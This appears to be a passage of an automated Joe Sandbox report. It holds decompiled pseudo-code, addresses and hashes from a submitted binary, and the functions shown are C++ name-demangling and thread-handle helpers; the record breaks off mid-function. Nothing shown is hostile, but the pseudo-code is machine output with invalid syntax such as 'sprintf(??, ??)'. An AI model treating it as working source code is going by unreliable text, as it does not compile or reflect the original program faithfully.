                                                                                                                                                                                                                                                                                                        • Instruction ID: f4f608b1dceb6418645120ccea16dd4763757164fdb04872707e84549da8f2de
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6a5695efae2835f33b0a44589fd0ae4fef321bba4350e7326e33b460c672c70
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28A15370608741CBC725DF28C0847ABBBE1EF94304F14883EE5DA9B341D779A885DB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                        			E004083F4(signed int* __ebx, void* __ecx, void* __ebp, char* _a4, signed int _a8, signed int _a12, signed int _a16, char _a48) {
                                                                                                                                                                                                                                                                                                        				signed int _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				signed int* _t93;
                                                                                                                                                                                                                                                                                                        				unsigned int _t97;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                                                                                                                                                        				signed int* _t108;
                                                                                                                                                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                                                                                                                                                        				signed int _t113;
                                                                                                                                                                                                                                                                                                        				signed int _t118;
                                                                                                                                                                                                                                                                                                        				signed int _t120;
                                                                                                                                                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                                                                                                                                                        				signed int* _t124;
                                                                                                                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t132;
                                                                                                                                                                                                                                                                                                        				char* _t134;
                                                                                                                                                                                                                                                                                                        				char* _t136;
                                                                                                                                                                                                                                                                                                        				signed char* _t138;
                                                                                                                                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                                                                                                                                        				signed int** _t142;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t108 = __ebx;
                                                                                                                                                                                                                                                                                                        				_t130 = _a12;
                                                                                                                                                                                                                                                                                                        				E0040B090(__ebx,  *((intOrPtr*)(__ecx + 4)), _t130);
                                                                                                                                                                                                                                                                                                        				_t87 = __ebx[0x40];
                                                                                                                                                                                                                                                                                                        				if((_t130 & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                                        					if(_t87 == 0xff) {
                                                                                                                                                                                                                                                                                                        						__ebx[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        						_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        						 *_t142 = __ebx;
                                                                                                                                                                                                                                                                                                        						_a8 = __ebx[0x43];
                                                                                                                                                                                                                                                                                                        						__ebx[0x42]();
                                                                                                                                                                                                                                                                                                        						_t122 = 1;
                                                                                                                                                                                                                                                                                                        						_t87 = 0;
                                                                                                                                                                                                                                                                                                        						__ebx[0x48] = __ebx[0x48] + 1;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t122 = _t87 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t108[0x40] = _t122;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_t108 + _t87)) = 0x2e;
                                                                                                                                                                                                                                                                                                        					_t108[0x41] = 0x2e;
                                                                                                                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					__esi = 0x41fa44;
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						__edx =  *__esi & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						if(__eax != 0xff) {
                                                                                                                                                                                                                                                                                                        							__ecx = __eax + 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							__eax =  *(__ebx + 0x10c);
                                                                                                                                                                                                                                                                                                        							_a16 = __edx;
                                                                                                                                                                                                                                                                                                        							 *((char*)(__ebx + 0xff)) = 0;
                                                                                                                                                                                                                                                                                                        							_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        							_a8 =  *(__ebx + 0x10c);
                                                                                                                                                                                                                                                                                                        							 *__esp = __ebx;
                                                                                                                                                                                                                                                                                                        							__eax =  *((intOrPtr*)(__ebx + 0x108))();
                                                                                                                                                                                                                                                                                                        							__ecx = 1;
                                                                                                                                                                                                                                                                                                        							__eax = 0;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(__ebx + 0x120)) =  *((intOrPtr*)(__ebx + 0x120)) + 1;
                                                                                                                                                                                                                                                                                                        							__edx = _a16;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__esi =  &(__esi[1]);
                                                                                                                                                                                                                                                                                                        						 *(__ebx + 0x100) = __ecx;
                                                                                                                                                                                                                                                                                                        						 *((char*)(__ebx + __eax)) = __dl;
                                                                                                                                                                                                                                                                                                        						 *((char*)(__ebx + 0x104)) = __dl;
                                                                                                                                                                                                                                                                                                        						if(__esi == 0x41fa46) {
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__eax = __ecx;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                                                                                                                        					_t132 = _a8;
                                                                                                                                                                                                                                                                                                        					if( *_t132 == 0x45) {
                                                                                                                                                                                                                                                                                                        						_t90 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        						_t134 = "{default arg#";
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_t123 =  *_t134 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							if(_t90 != 0xff) {
                                                                                                                                                                                                                                                                                                        								_t112 = _t90 + 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_a16 = _t123;
                                                                                                                                                                                                                                                                                                        								_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        								_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        								_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        								 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        								_t108[0x42]();
                                                                                                                                                                                                                                                                                                        								_t112 = 1;
                                                                                                                                                                                                                                                                                                        								_t90 = 0;
                                                                                                                                                                                                                                                                                                        								_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        								_t123 = _a16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t134 =  &(_t134[1]);
                                                                                                                                                                                                                                                                                                        							_t108[0x40] = _t112;
                                                                                                                                                                                                                                                                                                        							 *(_t108 + _t90) = _t123;
                                                                                                                                                                                                                                                                                                        							_t108[0x41] = _t123;
                                                                                                                                                                                                                                                                                                        							if(_t134 == 0x41fa54) {
                                                                                                                                                                                                                                                                                                        								break;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t90 = _t112;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_a4 = "%ld";
                                                                                                                                                                                                                                                                                                        						_a8 =  *((intOrPtr*)(_t132 + 8)) + 1;
                                                                                                                                                                                                                                                                                                        						_t93 =  &_a48;
                                                                                                                                                                                                                                                                                                        						 *_t142 = _t93;
                                                                                                                                                                                                                                                                                                        						_a16 = _t93;
                                                                                                                                                                                                                                                                                                        						sprintf(??, ??);
                                                                                                                                                                                                                                                                                                        						_t124 = _t93;
                                                                                                                                                                                                                                                                                                        						do {
                                                                                                                                                                                                                                                                                                        							_t113 =  *_t124;
                                                                                                                                                                                                                                                                                                        							_t124 =  &(_t124[1]);
                                                                                                                                                                                                                                                                                                        							_t97 = _t113 - 0x01010101 &  !_t113 & 0x80808080;
                                                                                                                                                                                                                                                                                                        						} while (_t97 == 0);
                                                                                                                                                                                                                                                                                                        						_t98 =  ==  ? _t97 >> 0x10 : _t97;
                                                                                                                                                                                                                                                                                                        						_t125 =  ==  ?  &(_t124[0]) : _t124;
                                                                                                                                                                                                                                                                                                        						_t99 = ( ==  ? _t97 >> 0x10 : _t97) + ( ==  ? _t97 >> 0x10 : _t97);
                                                                                                                                                                                                                                                                                                        						asm("sbb edx, 0x3");
                                                                                                                                                                                                                                                                                                        						_t126 = ( ==  ?  &(_t124[0]) : _t124) - _a16;
                                                                                                                                                                                                                                                                                                        						if(_t126 == 0) {
                                                                                                                                                                                                                                                                                                        							_t127 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        							L29:
                                                                                                                                                                                                                                                                                                        							_t136 = "}::";
                                                                                                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                                                                                                        								_t100 =  *_t136 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								if(_t127 != 0xff) {
                                                                                                                                                                                                                                                                                                        									_t118 = _t127 + 1;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_a16 = _t100;
                                                                                                                                                                                                                                                                                                        									_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        									_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        									_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        									 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        									_t108[0x42]();
                                                                                                                                                                                                                                                                                                        									_t118 = 1;
                                                                                                                                                                                                                                                                                                        									_t127 = 0;
                                                                                                                                                                                                                                                                                                        									_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        									_t100 = _a16;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t136 =  &(_t136[1]);
                                                                                                                                                                                                                                                                                                        								_t108[0x40] = _t118;
                                                                                                                                                                                                                                                                                                        								 *(_t108 + _t127) = _t100;
                                                                                                                                                                                                                                                                                                        								_t108[0x41] = _t100;
                                                                                                                                                                                                                                                                                                        								if(_t136 == 0x41fa5c) {
                                                                                                                                                                                                                                                                                                        									_t132 =  *((intOrPtr*)(_t132 + 4));
                                                                                                                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t127 = _t118;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t138 = _a16;
                                                                                                                                                                                                                                                                                                        						_t103 = _t108[0x40];
                                                                                                                                                                                                                                                                                                        						_t141 = _t126 + _t138;
                                                                                                                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                                                                                                                        							_t120 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							if(_t103 != 0xff) {
                                                                                                                                                                                                                                                                                                        								_t127 = _t103 + 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_a16 = _t120;
                                                                                                                                                                                                                                                                                                        								_t108[0x3f] = 0;
                                                                                                                                                                                                                                                                                                        								_a4 = 0xff;
                                                                                                                                                                                                                                                                                                        								_a8 = _t108[0x43];
                                                                                                                                                                                                                                                                                                        								 *_t142 = _t108;
                                                                                                                                                                                                                                                                                                        								_t108[0x42]();
                                                                                                                                                                                                                                                                                                        								_t127 = 1;
                                                                                                                                                                                                                                                                                                        								_t103 = 0;
                                                                                                                                                                                                                                                                                                        								_t108[0x48] = _t108[0x48] + 1;
                                                                                                                                                                                                                                                                                                        								_t120 = _a16;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t138 =  &(_t138[1]);
                                                                                                                                                                                                                                                                                                        							_t108[0x40] = _t127;
                                                                                                                                                                                                                                                                                                        							 *(_t108 + _t103) = _t120;
                                                                                                                                                                                                                                                                                                        							_t108[0x41] = _t120;
                                                                                                                                                                                                                                                                                                        							if(_t138 == _t141) {
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_t103 = _t127;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                                                                                                                        					_t87 = E0040B090(_t108, _t132, _a12);
                                                                                                                                                                                                                                                                                                        					return _t87;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}



























                                                                                                                                                                                                                                                                                                        0x004083f4
                                                                                                                                                                                                                                                                                                        0x004083f4
                                                                                                                                                                                                                                                                                                        0x004083ff
                                                                                                                                                                                                                                                                                                        0x00408407
                                                                                                                                                                                                                                                                                                        0x0040840d
                                                                                                                                                                                                                                                                                                        0x004095a3
                                                                                                                                                                                                                                                                                                        0x0040ab2b
                                                                                                                                                                                                                                                                                                        0x0040ab32
                                                                                                                                                                                                                                                                                                        0x0040ab3a
                                                                                                                                                                                                                                                                                                        0x0040ab3d
                                                                                                                                                                                                                                                                                                        0x0040ab41
                                                                                                                                                                                                                                                                                                        0x0040ab47
                                                                                                                                                                                                                                                                                                        0x0040ab4c
                                                                                                                                                                                                                                                                                                        0x0040ab4e
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095a9
                                                                                                                                                                                                                                                                                                        0x004095ac
                                                                                                                                                                                                                                                                                                        0x004095b2
                                                                                                                                                                                                                                                                                                        0x004095b6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00408413
                                                                                                                                                                                                                                                                                                        0x00408413
                                                                                                                                                                                                                                                                                                        0x00408443
                                                                                                                                                                                                                                                                                                        0x00408448
                                                                                                                                                                                                                                                                                                        0x0040844b
                                                                                                                                                                                                                                                                                                        0x00408420
                                                                                                                                                                                                                                                                                                        0x0040844d
                                                                                                                                                                                                                                                                                                        0x0040844d
                                                                                                                                                                                                                                                                                                        0x00408453
                                                                                                                                                                                                                                                                                                        0x00408457
                                                                                                                                                                                                                                                                                                        0x0040845e
                                                                                                                                                                                                                                                                                                        0x00408466
                                                                                                                                                                                                                                                                                                        0x0040846a
                                                                                                                                                                                                                                                                                                        0x0040846d
                                                                                                                                                                                                                                                                                                        0x00408473
                                                                                                                                                                                                                                                                                                        0x00408478
                                                                                                                                                                                                                                                                                                        0x0040847a
                                                                                                                                                                                                                                                                                                        0x00408481
                                                                                                                                                                                                                                                                                                        0x00408481
                                                                                                                                                                                                                                                                                                        0x00408423
                                                                                                                                                                                                                                                                                                        0x0040842c
                                                                                                                                                                                                                                                                                                        0x00408432
                                                                                                                                                                                                                                                                                                        0x00408435
                                                                                                                                                                                                                                                                                                        0x0040843b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00408441
                                                                                                                                                                                                                                                                                                        0x00408441
                                                                                                                                                                                                                                                                                                        0x004095bd
                                                                                                                                                                                                                                                                                                        0x004095bd
                                                                                                                                                                                                                                                                                                        0x004095c3
                                                                                                                                                                                                                                                                                                        0x0040a2e7
                                                                                                                                                                                                                                                                                                        0x0040a2ed
                                                                                                                                                                                                                                                                                                        0x0040a313
                                                                                                                                                                                                                                                                                                        0x0040a318
                                                                                                                                                                                                                                                                                                        0x0040a31b
                                                                                                                                                                                                                                                                                                        0x0040a2f4
                                                                                                                                                                                                                                                                                                        0x0040a31d
                                                                                                                                                                                                                                                                                                        0x0040a323
                                                                                                                                                                                                                                                                                                        0x0040a327
                                                                                                                                                                                                                                                                                                        0x0040a32e
                                                                                                                                                                                                                                                                                                        0x0040a336
                                                                                                                                                                                                                                                                                                        0x0040a33a
                                                                                                                                                                                                                                                                                                        0x0040a33d
                                                                                                                                                                                                                                                                                                        0x0040a343
                                                                                                                                                                                                                                                                                                        0x0040a348
                                                                                                                                                                                                                                                                                                        0x0040a34a
                                                                                                                                                                                                                                                                                                        0x0040a351
                                                                                                                                                                                                                                                                                                        0x0040a351
                                                                                                                                                                                                                                                                                                        0x0040a2f7
                                                                                                                                                                                                                                                                                                        0x0040a300
                                                                                                                                                                                                                                                                                                        0x0040a306
                                                                                                                                                                                                                                                                                                        0x0040a309
                                                                                                                                                                                                                                                                                                        0x0040a30f
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a311
                                                                                                                                                                                                                                                                                                        0x0040a311
                                                                                                                                                                                                                                                                                                        0x0040a35a
                                                                                                                                                                                                                                                                                                        0x0040a365
                                                                                                                                                                                                                                                                                                        0x0040a369
                                                                                                                                                                                                                                                                                                        0x0040a36f
                                                                                                                                                                                                                                                                                                        0x0040a372
                                                                                                                                                                                                                                                                                                        0x0040a376
                                                                                                                                                                                                                                                                                                        0x0040a37b
                                                                                                                                                                                                                                                                                                        0x0040a37d
                                                                                                                                                                                                                                                                                                        0x0040a37d
                                                                                                                                                                                                                                                                                                        0x0040a37f
                                                                                                                                                                                                                                                                                                        0x0040a38c
                                                                                                                                                                                                                                                                                                        0x0040a38c
                                                                                                                                                                                                                                                                                                        0x0040a39d
                                                                                                                                                                                                                                                                                                        0x0040a3a3
                                                                                                                                                                                                                                                                                                        0x0040a3a6
                                                                                                                                                                                                                                                                                                        0x0040a3a8
                                                                                                                                                                                                                                                                                                        0x0040a3ab
                                                                                                                                                                                                                                                                                                        0x0040a3af
                                                                                                                                                                                                                                                                                                        0x0040a41f
                                                                                                                                                                                                                                                                                                        0x0040a425
                                                                                                                                                                                                                                                                                                        0x0040a425
                                                                                                                                                                                                                                                                                                        0x0040a44f
                                                                                                                                                                                                                                                                                                        0x0040a455
                                                                                                                                                                                                                                                                                                        0x0040a458
                                                                                                                                                                                                                                                                                                        0x0040a430
                                                                                                                                                                                                                                                                                                        0x0040a45a
                                                                                                                                                                                                                                                                                                        0x0040a460
                                                                                                                                                                                                                                                                                                        0x0040a464
                                                                                                                                                                                                                                                                                                        0x0040a46b
                                                                                                                                                                                                                                                                                                        0x0040a473
                                                                                                                                                                                                                                                                                                        0x0040a477
                                                                                                                                                                                                                                                                                                        0x0040a47a
                                                                                                                                                                                                                                                                                                        0x0040a480
                                                                                                                                                                                                                                                                                                        0x0040a485
                                                                                                                                                                                                                                                                                                        0x0040a487
                                                                                                                                                                                                                                                                                                        0x0040a48e
                                                                                                                                                                                                                                                                                                        0x0040a48e
                                                                                                                                                                                                                                                                                                        0x0040a433
                                                                                                                                                                                                                                                                                                        0x0040a43c
                                                                                                                                                                                                                                                                                                        0x0040a442
                                                                                                                                                                                                                                                                                                        0x0040a445
                                                                                                                                                                                                                                                                                                        0x0040a44b
                                                                                                                                                                                                                                                                                                        0x0040a494
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a494
                                                                                                                                                                                                                                                                                                        0x0040a44d
                                                                                                                                                                                                                                                                                                        0x0040a44d
                                                                                                                                                                                                                                                                                                        0x0040a44f
                                                                                                                                                                                                                                                                                                        0x0040a3b1
                                                                                                                                                                                                                                                                                                        0x0040a3b5
                                                                                                                                                                                                                                                                                                        0x0040a3bb
                                                                                                                                                                                                                                                                                                        0x0040a3db
                                                                                                                                                                                                                                                                                                        0x0040a3e0
                                                                                                                                                                                                                                                                                                        0x0040a3e3
                                                                                                                                                                                                                                                                                                        0x0040a3c0
                                                                                                                                                                                                                                                                                                        0x0040a3e5
                                                                                                                                                                                                                                                                                                        0x0040a3eb
                                                                                                                                                                                                                                                                                                        0x0040a3ef
                                                                                                                                                                                                                                                                                                        0x0040a3f6
                                                                                                                                                                                                                                                                                                        0x0040a3fe
                                                                                                                                                                                                                                                                                                        0x0040a402
                                                                                                                                                                                                                                                                                                        0x0040a405
                                                                                                                                                                                                                                                                                                        0x0040a40b
                                                                                                                                                                                                                                                                                                        0x0040a410
                                                                                                                                                                                                                                                                                                        0x0040a412
                                                                                                                                                                                                                                                                                                        0x0040a419
                                                                                                                                                                                                                                                                                                        0x0040a419
                                                                                                                                                                                                                                                                                                        0x0040a3c3
                                                                                                                                                                                                                                                                                                        0x0040a3c8
                                                                                                                                                                                                                                                                                                        0x0040a3ce
                                                                                                                                                                                                                                                                                                        0x0040a3d1
                                                                                                                                                                                                                                                                                                        0x0040a3d7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040a3d9
                                                                                                                                                                                                                                                                                                        0x0040a3d9
                                                                                                                                                                                                                                                                                                        0x0040a3db
                                                                                                                                                                                                                                                                                                        0x004095c9
                                                                                                                                                                                                                                                                                                        0x004095d1
                                                                                                                                                                                                                                                                                                        0x00407a6f
                                                                                                                                                                                                                                                                                                        0x00407a6f

                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: .${default arg#$}::
                                                                                                                                                                                                                                                                                                        • API String ID: 0-723286900
                                                                                                                                                                                                                                                                                                        • Opcode ID: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
                                                                                                                                                                                                                                                                                                        • Instruction ID: 111b32b15ac1d8639141e8955343ba3e421cf829549de16c4b54ac847c584bdd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 807978e2fe12c8e62650436d5fac89316e3c74444dbfa66250aab1241fff8e95
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4714E70508382CBC715CF18C0847A5BBE1AF95304F1889BEECC99F386D7B99889DB56
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: sprintf
                                                                                                                                                                                                                                                                                                        • String ID: this${parm#$}
                                                                                                                                                                                                                                                                                                        • API String ID: 590974362-3278767634
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6ca329e72789fd266b2bb598c5e7687cf637df336f52b9e7cc6e2d8447b8da5e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30e33bfbb701848d574accebed10949c52124b3b754f770995b392d252369856
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC514A7050C2418BCB15CF28C0847A67BE1AF94310F0889BEECCD9F387D7B998859B96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 33%
                                                                                                                                                                                                                                                                                                        			E00412D80(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				char* _v72;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t66;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t67;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t68;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t57 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t63 = _a4;
                                                                                                                                                                                                                                                                                                        				 *_t66 = _t63;
                                                                                                                                                                                                                                                                                                        				_t33 = E004107C0(__edx);
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = 0xfeedbab1;
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v32 = 1;
                                                                                                                                                                                                                                                                                                        				_t56 = _t33;
                                                                                                                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                                                                                                                        					_t64 = 3;
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t64;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t35 =  *((intOrPtr*)(_t33 + 0x14));
                                                                                                                                                                                                                                                                                                        				if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v72 =  &_v48;
                                                                                                                                                                                                                                                                                                        				 *_t66 = _t35;
                                                                                                                                                                                                                                                                                                        				_t36 = GetHandleInformation(??, ??);
                                                                                                                                                                                                                                                                                                        				_t67 = _t66 - 8;
                                                                                                                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                                                                                                                        					_t64 = 0x16;
                                                                                                                                                                                                                                                                                                        					if(( *(_t56 + 0x24) & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                                                        						_t37 = E004102F0(_t56, _t57,  &_v48, _t63, 0x16);
                                                                                                                                                                                                                                                                                                        						if(_t37 == 0) {
                                                                                                                                                                                                                                                                                                        							_t38 = 0;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t38 =  *((intOrPtr*)(_t37 + 0xbc));
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t64 = 0x24;
                                                                                                                                                                                                                                                                                                        						if(_t63 != _t38) {
